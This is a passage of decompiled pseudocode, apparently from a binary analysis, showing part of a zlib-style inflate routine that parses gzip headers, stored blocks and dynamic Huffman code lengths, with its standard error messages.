                                                                                        														__eflags = __eax;
                                                                                        														if(__eax != 0) {
                                                                                        															__esi =  *(__eax + 0x1c);
                                                                                        															_v56 = __esi;
                                                                                        															__eflags = __esi;
                                                                                        															if(__esi != 0) {
                                                                                        																_t246 = __ecx + 0x44; // 0x98de8cd
                                                                                        																__esi =  *_t246;
                                                                                        																__eflags = __esi -  *((intOrPtr*)(__eax + 0x20));
                                                                                        																if(__esi <  *((intOrPtr*)(__eax + 0x20))) {
                                                                                        																	__eax = __esi;
                                                                                        																	__esi = _v56;
                                                                                        																	 *((char*)(__eax + _v56)) = _v5;
                                                                                        																	_t251 = __ecx + 0x44;
                                                                                        																	 *_t251 =  *(__ecx + 0x44) + 1;
                                                                                        																	__eflags =  *_t251;
                                                                                        																	__ebx = _v20;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        														__al = _v5;
                                                                                        														__eflags = __al;
                                                                                        														if(__al == 0) {
                                                                                        															break;
                                                                                        														}
                                                                                        														__eflags = __edx - __ebx;
                                                                                        														if(__edx < __ebx) {
                                                                                        															continue;
                                                                                        														}
                                                                                        														break;
                                                                                        													}
                                                                                        													__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        													__esi = _v28;
                                                                                        													_v64 = __edx;
                                                                                        													if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        														__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        														if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        															_push(__edx);
                                                                                        															_push(__edi);
                                                                                        															_t263 = __ecx + 0x1c; // 0x10482bff
                                                                                        															__eax = E0018BB60( *_t263);
                                                                                        															__ecx = _v16;
                                                                                        															__edx = _v64;
                                                                                        															 *(__ecx + 0x1c) = __eax;
                                                                                        															__al = _v5;
                                                                                        														}
                                                                                        													}
                                                                                        													__ebx = __ebx - __edx;
                                                                                        													__edi = __edi + __edx;
                                                                                        													_v20 = __ebx;
                                                                                        													_v24 = __edi;
                                                                                        													__eflags = __al;
                                                                                        													if(__al == 0) {
                                                                                        														L120:
                                                                                        														 *(__ecx + 0x44) = 0;
                                                                                        														 *(__ecx + 4) = 0x3f3b;
                                                                                        														goto L121;
                                                                                        													} else {
                                                                                        														goto L108;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 7:
                                                                                        											L121:
                                                                                        											__eflags =  *(__ecx + 0x14) & 0x00001000;
                                                                                        											if(( *(__ecx + 0x14) & 0x00001000) == 0) {
                                                                                        												_t326 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__eax =  *_t326;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													 *(__eax + 0x24) = 0;
                                                                                        												}
                                                                                        												goto L137;
                                                                                        											} else {
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L108;
                                                                                        												} else {
                                                                                        													__edx = 0;
                                                                                        													__eflags = 0;
                                                                                        													while(1) {
                                                                                        														__al =  *(__edi + __edx);
                                                                                        														__edx = __edx + 1;
                                                                                        														_v5 = __al;
                                                                                        														_t299 = __ecx + 0x24; // 0x5051ffff
                                                                                        														__eax =  *_t299;
                                                                                        														__eflags = __eax;
                                                                                        														if(__eax != 0) {
                                                                                        															__esi =  *(__eax + 0x24);
                                                                                        															_v56 = __esi;
                                                                                        															__eflags = __esi;
                                                                                        															if(__esi != 0) {
                                                                                        																_t302 = __ecx + 0x44; // 0x98de8cd
                                                                                        																__esi =  *_t302;
                                                                                        																__eflags = __esi -  *((intOrPtr*)(__eax + 0x28));
                                                                                        																if(__esi <  *((intOrPtr*)(__eax + 0x28))) {
                                                                                        																	__eax = __esi;
                                                                                        																	__esi = _v56;
                                                                                        																	 *((char*)(__eax + _v56)) = _v5;
                                                                                        																	_t307 = __ecx + 0x44;
                                                                                        																	 *_t307 =  *(__ecx + 0x44) + 1;
                                                                                        																	__eflags =  *_t307;
                                                                                        																	__ebx = _v20;
                                                                                        																}
                                                                                        															}
                                                                                        														}
                                                                                        														__al = _v5;
                                                                                        														__eflags = __al;
                                                                                        														if(__al == 0) {
                                                                                        															break;
                                                                                        														}
                                                                                        														__eflags = __edx - __ebx;
                                                                                        														if(__edx < __ebx) {
                                                                                        															continue;
                                                                                        														}
                                                                                        														break;
                                                                                        													}
                                                                                        													__eflags =  *(__ecx + 0x14) & 0x00000200;
                                                                                        													__esi = _v28;
                                                                                        													_v64 = __edx;
                                                                                        													if(( *(__ecx + 0x14) & 0x00000200) != 0) {
                                                                                        														__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        														if(( *(__ecx + 0xc) & 0x00000004) != 0) {
                                                                                        															_push(__edx);
                                                                                        															_push(__edi);
                                                                                        															_t319 = __ecx + 0x1c; // 0x10482bff
                                                                                        															__eax = E0018BB60( *_t319);
                                                                                        															__ecx = _v16;
                                                                                        															__edx = _v64;
                                                                                        															 *(__ecx + 0x1c) = __eax;
                                                                                        															__al = _v5;
                                                                                        														}
                                                                                        													}
                                                                                        													__ebx = __ebx - __edx;
                                                                                        													__edi = __edi + __edx;
                                                                                        													_v20 = __ebx;
                                                                                        													_v24 = __edi;
                                                                                        													__eflags = __al;
                                                                                        													if(__al != 0) {
                                                                                        														goto L108;
                                                                                        													} else {
                                                                                        														L137:
                                                                                        														__edx = _v12;
                                                                                        														 *(__ecx + 4) = 0x3f3c;
                                                                                        														goto L138;
                                                                                        													}
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 8:
                                                                                        											L138:
                                                                                        											_t330 = __ecx + 0x14; // 0xfff84d8d
                                                                                        											__eax =  *_t330;
                                                                                        											_v64 = __eax;
                                                                                        											__eflags = __eax & 0x00000200;
                                                                                        											if((__eax & 0x00000200) == 0) {
                                                                                        												L148:
                                                                                        												_t348 = __ecx + 0x24; // 0x5051ffff
                                                                                        												__eax =  *_t348;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax != 0) {
                                                                                        													_v64 = _v64 >> 9;
                                                                                        													__edx = _v64 >> 0x00000009 & 0x00000001;
                                                                                        													__eflags = __edx;
                                                                                        													 *(__eax + 0x2c) = __edx;
                                                                                        													_t351 = __ecx + 0x24; // 0x5051ffff
                                                                                        													__eax =  *_t351;
                                                                                        													 *( *_t351 + 0x30) = 1;
                                                                                        												}
                                                                                        												_push(0);
                                                                                        												_push(0);
                                                                                        												__eax = E0018BB60(0);
                                                                                        												__ecx = _v16;
                                                                                        												__edx = _a4;
                                                                                        												 *(__ecx + 0x1c) = __eax;
                                                                                        												 *(_a4 + 0x30) = __eax;
                                                                                        												__edx = _v12;
                                                                                        												 *(__ecx + 4) = 0x3f3f;
                                                                                        												goto L271;
                                                                                        											} else {
                                                                                        												__eflags = __esi - 0x10;
                                                                                        												if(__esi >= 0x10) {
                                                                                        													L144:
                                                                                        													__eflags =  *(__ecx + 0xc) & 0x00000004;
                                                                                        													if(( *(__ecx + 0xc) & 0x00000004) == 0) {
                                                                                        														L147:
                                                                                        														__esi = 0;
                                                                                        														__eflags = 0;
                                                                                        														_v12 = 0;
                                                                                        														_v28 = 0;
                                                                                        														goto L148;
                                                                                        													} else {
                                                                                        														_t342 = __ecx + 0x1c; // 0x10482bff
                                                                                        														__eax =  *_t342 & 0x0000ffff;
                                                                                        														__eflags = __edx - ( *_t342 & 0x0000ffff);
                                                                                        														if(__edx == ( *_t342 & 0x0000ffff)) {
                                                                                        															goto L147;
                                                                                        														} else {
                                                                                        															__eax = _a4;
                                                                                        															 *(_a4 + 0x18) = "header crc mismatch";
                                                                                        															 *(__ecx + 4) = 0x3f51;
                                                                                        														}
                                                                                        													}
                                                                                        													goto L271;
                                                                                        												} else {
                                                                                        													asm("o16 nop [eax+eax]");
                                                                                        													while(1) {
                                                                                        														__eflags = __ebx;
                                                                                        														if(__ebx == 0) {
                                                                                        															goto L108;
                                                                                        														}
                                                                                        														__eax =  *__edi & 0x000000ff;
                                                                                        														__ecx = __esi;
                                                                                        														__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        														__esi = __esi + 8;
                                                                                        														__ebx = __ebx - 1;
                                                                                        														_v28 = __esi;
                                                                                        														__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        														_v20 = __ebx;
                                                                                        														__edi = __edi + 1;
                                                                                        														_v12 = __edx;
                                                                                        														_v24 = __edi;
                                                                                        														__eflags = __esi - 0x10;
                                                                                        														if(__esi < 0x10) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															__ecx = _v16;
                                                                                        															goto L144;
                                                                                        														}
                                                                                        														goto L369;
                                                                                        													}
                                                                                        													goto L108;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 9:
                                                                                        											__eflags = __esi - 0x20;
                                                                                        											if(__esi >= 0x20) {
                                                                                        												L154:
                                                                                        												__ecx = __edx;
                                                                                        												__edx = __edx << 0x10;
                                                                                        												__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                        												__edx = __edx >> 8;
                                                                                        												__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                        												__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                        												__edx = __edx >> 0x18;
                                                                                        												__eax = __eax + __ecx;
                                                                                        												__ecx = _v16;
                                                                                        												__eax = __eax + __edx;
                                                                                        												__edx = _a4;
                                                                                        												 *(__ecx + 0x1c) = __eax;
                                                                                        												 *(_a4 + 0x30) = __eax;
                                                                                        												__edx = 0;
                                                                                        												_v12 = 0;
                                                                                        												__esi = 0;
                                                                                        												__eflags = 0;
                                                                                        												 *(__ecx + 4) = 0x3f3e;
                                                                                        												goto L155;
                                                                                        											} else {
                                                                                        												while(1) {
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													_v20 = __ebx;
                                                                                        													__edi = __edi + 1;
                                                                                        													_v12 = __edx;
                                                                                        													__esi = __esi + 8;
                                                                                        													_v24 = __edi;
                                                                                        													__eflags = __esi - 0x20;
                                                                                        													if(__esi < 0x20) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														goto L154;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        												}
                                                                                        												goto L108;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0xa:
                                                                                        											L155:
                                                                                        											__eflags =  *(__ecx + 0x10);
                                                                                        											if( *(__ecx + 0x10) == 0) {
                                                                                        												__eax = _a4;
                                                                                        												__ecx = _v40;
                                                                                        												 *(__eax + 0xc) = _v40;
                                                                                        												__ecx = _v32;
                                                                                        												 *(__eax + 0x10) = _v32;
                                                                                        												__ecx = _v16;
                                                                                        												 *__eax = __edi;
                                                                                        												 *(__eax + 4) = __ebx;
                                                                                        												__eax = 2;
                                                                                        												 *(__ecx + 0x40) = __esi;
                                                                                        												_pop(__esi);
                                                                                        												_pop(__ebx);
                                                                                        												 *(__ecx + 0x3c) = __edx;
                                                                                        												_pop(__edi);
                                                                                        												return 2;
                                                                                        											} else {
                                                                                        												_push(0);
                                                                                        												__eax = E0018A060(0, 0);
                                                                                        												__ecx = _v16;
                                                                                        												__edx = _a4;
                                                                                        												 *(__ecx + 0x1c) = __eax;
                                                                                        												 *(_a4 + 0x30) = __eax;
                                                                                        												__edx = _v12;
                                                                                        												 *(__ecx + 4) = 0x3f3f;
                                                                                        												goto L157;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0xb:
                                                                                        											L157:
                                                                                        											__eax = _a8;
                                                                                        											__eflags = __eax - 5;
                                                                                        											if(__eax == 5) {
                                                                                        												goto L108;
                                                                                        											} else {
                                                                                        												__eflags = __eax - 6;
                                                                                        												if(__eax == 6) {
                                                                                        													goto L108;
                                                                                        												} else {
                                                                                        													goto L159;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0xc:
                                                                                        											L159:
                                                                                        											__eflags =  *(__ecx + 8);
                                                                                        											if( *(__ecx + 8) == 0) {
                                                                                        												__eflags = __esi - 3;
                                                                                        												if(__esi >= 3) {
                                                                                        													L166:
                                                                                        													__eax = __edx;
                                                                                        													__edx = __edx >> 1;
                                                                                        													 *(__ecx + 8) = __eax;
                                                                                        													__edx = __edx & 0x00000003;
                                                                                        													switch( *((intOrPtr*)((__edx & 0x00000003) * 4 +  &M00189C3C))) {
                                                                                        														case 0:
                                                                                        															__edx = __edx >> 2;
                                                                                        															__esi = __esi - 3;
                                                                                        															 *(__ecx + 4) = 0x3f41;
                                                                                        															_v12 = __edx;
                                                                                        															_v28 = __esi;
                                                                                        															goto L271;
                                                                                        														case 1:
                                                                                        															__eax = E00188440(__ecx);
                                                                                        															 *(__ecx + 4) = 0x3f47;
                                                                                        															__eflags = _a8 - 6;
                                                                                        															if(_a8 != 6) {
                                                                                        																goto L172;
                                                                                        															} else {
                                                                                        																__edx = __edx >> 2;
                                                                                        																__esi = __esi - 3;
                                                                                        																_v12 = __edx;
                                                                                        																goto L108;
                                                                                        															}
                                                                                        															goto L369;
                                                                                        														case 2:
                                                                                        															__edx = __edx >> 2;
                                                                                        															__esi = __esi - 3;
                                                                                        															 *(__ecx + 4) = 0x3f44;
                                                                                        															_v12 = __edx;
                                                                                        															_v28 = __esi;
                                                                                        															goto L271;
                                                                                        														case 3:
                                                                                        															__eax = _a4;
                                                                                        															 *(_a4 + 0x18) = "invalid block type";
                                                                                        															 *(__ecx + 4) = 0x3f51;
                                                                                        															L172:
                                                                                        															__edx = __edx >> 2;
                                                                                        															__esi = __esi - 3;
                                                                                        															_v12 = __edx;
                                                                                        															_v28 = __esi;
                                                                                        															goto L271;
                                                                                        													}
                                                                                        												} else {
                                                                                        													while(1) {
                                                                                        														__eflags = __ebx;
                                                                                        														if(__ebx == 0) {
                                                                                        															goto L108;
                                                                                        														}
                                                                                        														__eax =  *__edi & 0x000000ff;
                                                                                        														__ecx = __esi;
                                                                                        														__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        														__ebx = __ebx - 1;
                                                                                        														__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        														_v20 = __ebx;
                                                                                        														__edi = __edi + 1;
                                                                                        														_v12 = __edx;
                                                                                        														__esi = __esi + 8;
                                                                                        														_v24 = __edi;
                                                                                        														__eflags = __esi - 3;
                                                                                        														if(__esi < 3) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															__ecx = _v16;
                                                                                        															goto L166;
                                                                                        														}
                                                                                        														goto L369;
                                                                                        													}
                                                                                        													goto L108;
                                                                                        												}
                                                                                        											} else {
                                                                                        												__esi = __esi & 0x00000007;
                                                                                        												__edx = __edx >> __cl;
                                                                                        												__esi = __esi - (__esi & 0x00000007);
                                                                                        												__ecx = _v16;
                                                                                        												_v12 = __edx;
                                                                                        												_v28 = __esi;
                                                                                        												 *(__ecx + 4) = 0x3f4e;
                                                                                        												goto L271;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0xd:
                                                                                        											__esi = __esi & 0x00000007;
                                                                                        											__esi = __esi - (__esi & 0x00000007);
                                                                                        											__edx = __edx >> __cl;
                                                                                        											_v12 = __edx;
                                                                                        											_v28 = __esi;
                                                                                        											__eflags = __esi - 0x20;
                                                                                        											if(__esi >= 0x20) {
                                                                                        												L176:
                                                                                        												__eax = __edx;
                                                                                        												__ecx = __dx & 0x0000ffff;
                                                                                        												__eax =  !__edx;
                                                                                        												_v64 = __ecx;
                                                                                        												__eax =  !__edx >> 0x10;
                                                                                        												__eflags = __ecx -  !__edx >> 0x10;
                                                                                        												__ecx = _v16;
                                                                                        												if(__eflags == 0) {
                                                                                        													__eax = _v64;
                                                                                        													__edx = 0;
                                                                                        													__esi = 0;
                                                                                        													 *(__ecx + 0x44) = _v64;
                                                                                        													__eflags = _a8 - 6;
                                                                                        													_v12 = 0;
                                                                                        													_v28 = 0;
                                                                                        													 *(__ecx + 4) = 0x3f42;
                                                                                        													if(_a8 == 6) {
                                                                                        														goto L108;
                                                                                        													} else {
                                                                                        														goto L179;
                                                                                        													}
                                                                                        												} else {
                                                                                        													__eax = _a4;
                                                                                        													 *(_a4 + 0x18) = "invalid stored block lengths";
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        													goto L271;
                                                                                        												}
                                                                                        											} else {
                                                                                        												while(1) {
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__esi = __esi + 8;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													_v28 = __esi;
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													_v20 = __ebx;
                                                                                        													__edi = __edi + 1;
                                                                                        													_v12 = __edx;
                                                                                        													_v24 = __edi;
                                                                                        													__eflags = __esi - 0x20;
                                                                                        													if(__esi < 0x20) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														goto L176;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        												}
                                                                                        												goto L108;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0xe:
                                                                                        											L179:
                                                                                        											 *(__ecx + 4) = 0x3f43;
                                                                                        											goto L180;
                                                                                        										case 0xf:
                                                                                        											L180:
                                                                                        											__eax =  *(__ecx + 0x44);
                                                                                        											_v64 = __eax;
                                                                                        											__eflags = __eax;
                                                                                        											if(__eax == 0) {
                                                                                        												 *(__ecx + 4) = 0x3f3f;
                                                                                        												goto L271;
                                                                                        											} else {
                                                                                        												__eflags = _v64 - __ebx;
                                                                                        												__eax = __ebx;
                                                                                        												__ecx = _v32;
                                                                                        												__eax =  <=  ? _v64 : __ebx;
                                                                                        												__eflags = __eax - __ecx;
                                                                                        												__ecx =  <=  ? __eax : __ecx;
                                                                                        												_v64 = __ecx;
                                                                                        												__eflags = __ecx;
                                                                                        												if(__ecx == 0) {
                                                                                        													goto L108;
                                                                                        												} else {
                                                                                        													__eax = memcpy(_v40, __edi, __ecx);
                                                                                        													__eax = _v64;
                                                                                        													__esp = __esp + 0xc;
                                                                                        													__ecx = _v16;
                                                                                        													__ebx = __ebx - __eax;
                                                                                        													_v32 = _v32 - __eax;
                                                                                        													__edi = __edi + __eax;
                                                                                        													_v40 = _v40 + __eax;
                                                                                        													__edx = _v12;
                                                                                        													 *(__ecx + 0x44) =  *(__ecx + 0x44) - __eax;
                                                                                        													_v20 = __ebx;
                                                                                        													_v24 = __edi;
                                                                                        													goto L271;
                                                                                        												}
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0x10:
                                                                                        											__eflags = __esi - 0xe;
                                                                                        											if(__esi >= 0xe) {
                                                                                        												L187:
                                                                                        												__eax = _v16;
                                                                                        												__ecx = __edx;
                                                                                        												__edx = __edx >> 5;
                                                                                        												__ecx = __ecx & 0x0000001f;
                                                                                        												__edi = __edx;
                                                                                        												__ecx = __ecx + 0x101;
                                                                                        												__edi = __edx & 0x0000001f;
                                                                                        												__edx = __edx >> 5;
                                                                                        												__edi = __edi + 1;
                                                                                        												 *(__eax + 0x64) = __ecx;
                                                                                        												 *(__eax + 0x68) = __edi;
                                                                                        												__esi = __esi - 0xe;
                                                                                        												_v64 = __edi;
                                                                                        												__eax = __edx;
                                                                                        												__edi = _v16;
                                                                                        												__eax = __edx & 0x0000000f;
                                                                                        												__eax = (__edx & 0x0000000f) + 4;
                                                                                        												__edx = __edx >> 4;
                                                                                        												_v12 = __edx;
                                                                                        												_v28 = __esi;
                                                                                        												 *(_v16 + 0x60) = __eax;
                                                                                        												__edi = _v24;
                                                                                        												__eflags = __ecx - 0x11e;
                                                                                        												if(__ecx > 0x11e) {
                                                                                        													L200:
                                                                                        													__eax = _a4;
                                                                                        													__ecx = _v16;
                                                                                        													 *(_a4 + 0x18) = "too many length or distance symbols";
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        													goto L271;
                                                                                        												} else {
                                                                                        													__eflags = _v64 - 0x1e;
                                                                                        													if(_v64 > 0x1e) {
                                                                                        														goto L200;
                                                                                        													} else {
                                                                                        														__ecx = _v16;
                                                                                        														 *(__ecx + 0x6c) = 0;
                                                                                        														 *(__ecx + 4) = 0x3f45;
                                                                                        														goto L190;
                                                                                        													}
                                                                                        												}
                                                                                        											} else {
                                                                                        												while(1) {
                                                                                        													__eflags = __ebx;
                                                                                        													if(__ebx == 0) {
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													__eax =  *__edi & 0x000000ff;
                                                                                        													__ecx = __esi;
                                                                                        													__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        													__ebx = __ebx - 1;
                                                                                        													__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        													_v20 = __ebx;
                                                                                        													__edi = __edi + 1;
                                                                                        													_v12 = __edx;
                                                                                        													__esi = __esi + 8;
                                                                                        													_v24 = __edi;
                                                                                        													__eflags = __esi - 0xe;
                                                                                        													if(__esi < 0xe) {
                                                                                        														continue;
                                                                                        													} else {
                                                                                        														goto L187;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        												}
                                                                                        												goto L108;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0x11:
                                                                                        											L190:
                                                                                        											__eax =  *(__ecx + 0x6c);
                                                                                        											__eflags = __eax -  *((intOrPtr*)(__ecx + 0x60));
                                                                                        											if(__eax >=  *((intOrPtr*)(__ecx + 0x60))) {
                                                                                        												L196:
                                                                                        												__eflags = __eax - 0x13;
                                                                                        												if(__eax < 0x13) {
                                                                                        													do {
                                                                                        														__eax =  *(__ecx + 0x6c);
                                                                                        														__edx = 0;
                                                                                        														__eax =  *(0x194078 +  *(__ecx + 0x6c) * 2) & 0x0000ffff;
                                                                                        														 *(__ecx + 0x74 + ( *(0x194078 +  *(__ecx + 0x6c) * 2) & 0x0000ffff) * 2) = __dx;
                                                                                        														 *(__ecx + 0x6c) =  *(__ecx + 0x6c) + 1;
                                                                                        														__eflags =  *(__ecx + 0x6c) - 0x13;
                                                                                        													} while ( *(__ecx + 0x6c) < 0x13);
                                                                                        												}
                                                                                        												__eax = __ecx + 0x534;
                                                                                        												 *(__ecx + 0x58) = 7;
                                                                                        												__edx = __ecx + 0x70;
                                                                                        												 *(__ecx + 0x50) = __eax;
                                                                                        												 *(__ecx + 0x70) = __eax;
                                                                                        												__ecx = __ecx + 0x58;
                                                                                        												_v16 = _v16 + 0x2f4;
                                                                                        												_v16 = _v16 + 0x74;
                                                                                        												__eax = E0018BE70(0, _v16 + 0x74, 0x13, __edx, __ecx, _v16 + 0x2f4);
                                                                                        												__ecx = _v16;
                                                                                        												__edx = _v12;
                                                                                        												_v52 = __eax;
                                                                                        												__eflags = __eax;
                                                                                        												if(__eax == 0) {
                                                                                        													 *(__ecx + 0x6c) = 0;
                                                                                        													 *(__ecx + 4) = 0x3f46;
                                                                                        													_v48 = 0x3f46;
                                                                                        													goto L202;
                                                                                        												} else {
                                                                                        													__eax = _a4;
                                                                                        													 *(_a4 + 0x18) = "invalid code lengths set";
                                                                                        													 *(__ecx + 4) = 0x3f51;
                                                                                        													goto L271;
                                                                                        												}
                                                                                        											} else {
                                                                                        												do {
                                                                                        													__eflags = __esi - 3;
                                                                                        													if(__esi >= 3) {
                                                                                        														goto L195;
                                                                                        													} else {
                                                                                        														while(1) {
                                                                                        															__eflags = __ebx;
                                                                                        															if(__ebx == 0) {
                                                                                        																goto L108;
                                                                                        															}
                                                                                        															__eax =  *__edi & 0x000000ff;
                                                                                        															__ecx = __esi;
                                                                                        															__eax = ( *__edi & 0x000000ff) << __cl;
                                                                                        															__ebx = __ebx - 1;
                                                                                        															__edx = __edx + (( *__edi & 0x000000ff) << __cl);
                                                                                        															_v20 = __ebx;
                                                                                        															__edi = __edi + 1;
                                                                                        															_v12 = __edx;
                                                                                        															__esi = __esi + 8;
                                                                                        															_v24 = __edi;
                                                                                        															__eflags = __esi - 3;
                                                                                        															if(__esi < 3) {
                                                                                        																continue;
                                                                                        															} else {
                                                                                        																goto L195;
                                                                                        															}
                                                                                        															goto L369;
                                                                                        														}
                                                                                        														goto L108;
                                                                                        													}
                                                                                        													goto L369;
                                                                                        													L195:
                                                                                        													__eax = _v16;
                                                                                        													__ecx = __edx;
                                                                                        													__edi = _v16;
                                                                                        													__ecx = __edx & 0x00000007;
                                                                                        													__edx = __edx >> 3;
                                                                                        													__esi = __esi - 3;
                                                                                        													_v12 = __edx;
                                                                                        													__eax =  *(_v16 + 0x6c);
                                                                                        													_v28 = __esi;
                                                                                        													__eax =  *(0x194078 +  *(_v16 + 0x6c) * 2) & 0x0000ffff;
                                                                                        													 *((short*)(__edi + 0x74 + ( *(0x194078 +  *(_v16 + 0x6c) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                        													__ecx = __edi;
                                                                                        													__edi = _v24;
                                                                                        													 *(__ecx + 0x6c) =  *(__ecx + 0x6c) + 1;
                                                                                        													__eax =  *(__ecx + 0x6c);
                                                                                        													__eflags = __eax -  *((intOrPtr*)(__ecx + 0x60));
                                                                                        												} while (__eax <  *((intOrPtr*)(__ecx + 0x60)));
                                                                                        												goto L196;
                                                                                        											}
                                                                                        											goto L369;
                                                                                        										case 0x12:
                                                                                        											L202:
                                                                                        											 *((intOrPtr*)(__ecx + 0x68)) =  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64);
                                                                                        											__eflags =  *(__ecx + 0x6c) -  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64);
                                                                                        											if( *(__ecx + 0x6c) >=  *((intOrPtr*)(__ecx + 0x68)) +  *(__ecx + 0x64)) {
                                                                                        												__eax = _v48;
                                                                                        												goto L238;
                                                                                        											} else {
                                                                                        												do {
                                                                                        													__ecx =  *(__ecx + 0x58);
                                                                                        													__eax = 1;
                                                                                        													_t507 = (1 << __cl) - 1; // 0x0
                                                                                        													__ecx = _t507;
                                                                                        													__eax = _v16;
                                                                                        													_v64 = __ecx;
                                                                                        													__ecx = __ecx & __edx;
                                                                                        													__edi =  *(_v16 + 0x50);
                                                                                        													_v56 = __edi;
                                                                                        													__eax =  *(__edi + __ecx * 4);
                                                                                        													__eax = __eax >> 8;
                                                                                        													__eax = __eax >> 0x10;
                                                                                        													_v48 = __eax >> 8;
                                                                                        													__ecx = __cl & 0x000000ff;
                                                                                        													_v28 = __eax >> 0x10;
                                                                                        													__edi = _v24;
                                                                                        													__eflags = (__cl & 0x000000ff) - __esi;
                                                                                        													if((__cl & 0x000000ff) <= __esi) {
                                                                                        														L207:
                                                                                        														__ebx = _v28;
                                                                                        														__ecx = _v48;
                                                                                        														__ebx = __bx & 0x0000ffff;
                                                                                        														_v68 = __ebx;
                                                                                        														__eflags = __ebx - 0x10;
                                                                                        														__ebx = _v20;
                                                                                        														_v64 = __ecx;
                                                                                        														_v48 = __ecx;
                                                                                        														_v56 = __ecx;
                                                                                        														if(__eflags >= 0) {
                                                                                        															__eflags = _v28 - 0x10;
                                                                                        															if(_v28 != 0x10) {
                                                                                        																__eflags = _v68 - 0x11;
                                                                                        																__ecx = _v64;
                                                                                        																__ecx = __cl & 0x000000ff;
                                                                                        																_v64 = __ecx;
                                                                                        																if(_v68 != 0x11) {
                                                                                        																	__ecx = __ecx + 7;
                                                                                        																	__eflags = __esi - __ecx;
                                                                                        																	if(__esi >= __ecx) {
                                                                                        																		L228:
                                                                                        																		__ecx = __ah & 0x000000ff;
                                                                                        																		__edx = __edx >> __cl;
                                                                                        																		__edx = __edx & 0x0000007f;
                                                                                        																		__eax = (__edx & 0x0000007f) + 0xb;
                                                                                        																		__edx = __edx >> 7;
                                                                                        																		__eflags = __edx;
                                                                                        																		_v48 = __eax;
                                                                                        																		__eax = 0xfffffff9;
                                                                                        																		goto L229;
                                                                                        																	} else {
                                                                                        																		while(1) {
                                                                                        																			__eflags = __ebx;
                                                                                        																			if(__ebx == 0) {
                                                                                        																				goto L108;
                                                                                        																			}
                                                                                        																			__edx =  *__edi & 0x000000ff;
                                                                                        																			__ecx = __esi;
                                                                                        																			__edx = ( *__edi & 0x000000ff) << __cl;
                                                                                        																			__ebx = __ebx - 1;
                                                                                        																			__ecx = _v64;
                                                                                        																			__edi = __edi + 1;
                                                                                        																			_v12 = _v12 + __edx;
                                                                                        																			__esi = __esi + 8;
                                                                                        																			__ecx = _v64 + 7;
                                                                                        																			_v20 = __ebx;
                                                                                        																			_v24 = __edi;
                                                                                        																			__eflags = __esi - _v64 + 7;
                                                                                        																			if(__esi < _v64 + 7) {
                                                                                        																				continue;
                                                                                        																			} else {
                                                                                        																				__edx = _v12;
                                                                                        																				goto L228;
                                                                                        																			}
                                                                                        																			goto L369;
                                                                                        																		}
                                                                                        																		goto L108;
                                                                                        																	}
                                                                                        																} else {
                                                                                        																	__ecx = __ecx + 3;
                                                                                        																	__eflags = __esi - __ecx;
                                                                                        																	if(__esi >= __ecx) {
                                                                                        																		L222:
                                                                                        																		__ecx = __ah & 0x000000ff;
                                                                                        																		__edx = __edx >> __cl;
                                                                                        																		__edx = __edx & 0x00000007;
                                                                                        																		__eax = (__edx & 0x00000007) + 3;
                                                                                        																		__edx = __edx >> 3;
                                                                                        																		_v48 = __eax;
                                                                                        																		__eax = 0xfffffffd;
                                                                                        																		L229:
                                                                                        																		__eax = __eax - __ecx;
                                                                                        																		_v56 = 0;
